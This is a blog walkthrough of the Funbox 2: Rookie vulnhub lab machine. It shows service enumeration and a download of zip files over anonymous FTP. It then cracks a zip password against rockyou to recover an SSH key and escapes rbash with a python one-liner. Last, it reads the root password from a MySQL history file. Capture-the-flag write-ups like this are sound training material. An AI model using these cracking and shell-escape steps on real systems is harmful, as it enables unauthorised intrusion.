Funbox 2: Rookie | vulnhub | walkthrough
This post is to show, how I have solved Funbox: Rookie from vulnhub. This is a boo2root and real life like. There are 3 steps to get the root shell.
1. Enumeration: nmap scan reveals service info
2. Exploitation: password cracking and ssh
3. Privilege Escalation: MySQL history file
Now let's talk about the details process.
1. Enumeration:
21/tcp open ftp
22/tcp open ssh
80/tcp open http
21/tcp open ftp ProFTPD 1.3.5e
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
5) Nikto scan reveals nothing but robots.txt;
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5ab414e93acbc, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found.
6) Nothing interesting in robots.txt
7) As there is nothing interesting in web, let's try ftp. And I have found that anonymous ftp login is allowed. then tried to see all the files
$ ftp IP
ftp> ls -a
drwxr-xr-x 2 ftp ftp 4096 Jul 25 11:07 .
drwxr-xr-x 2 ftp ftp 4096 Jul 25 11:07 ..
-rw-r--r-- 1 ftp ftp 153 Jul 25 11:06 .@admins
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:52 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:58 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 10:44 tom.zip
-rw-r--r-- 1 ftp ftp 114 Jul 25 11:07 .@users
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 zlatan.zip
8) Can not wait to download these interesting files.
$ wget -m ftp://anonymous:anonymous@10.0.2.34
9) .@users reveal some info:
$ cat .@users
and it says:
Hi Users,
be carefull with your keys. Find them in %yourname%.zip.
The passwords are the old ones.
Regards
root
10) Those .zip files are password protected. I have tried to unzip and failed.
2. Exploitation:
11) let's try fcrackzip to get zip password and read.
$ fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' tom.zip
I have failed and it shows nothing.
12) Now trying johnTheRipper to get password. But I need to create hash of files.
14) Let's unzip a file now. Trying to unzip (unzip tom.zip) and got id_rsa, which contains ssh key.
15) Now change the permission of id_rsa
$ chmod +x id_rsa
16) Login using this private key
$ ssh -i id_rsa tom@IP
and I have failed to login. Because, private key permission should be only for root.
17) Now changing the private key permission (chmod 600 id_rsa) and then trying to ssh again. This time I have succeeded.
18) After login, I have tried some commands and found that rbash is running. In this LINK you will find some useful way to bypass bash restriction.
3. Privilege Escalation:
19) Importing python bash shell solves the problem.
$ python3 -c ‘import os; os.system("/bin/bash");’
20) I have got .mysql_history and trying to read it
21) The history file reveals some info but in a formatted way like this:
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
so I have removed the space and make it understandable
$ sed "s/\\\040/ /g" < .mysql_history
It reveals password!
22) The root password is: xx11yy22!
Now I can login as root
$ sudo su
after changing directory (cd /root) I can now read the root flag.
Awesome! I have the root shell.
No comments: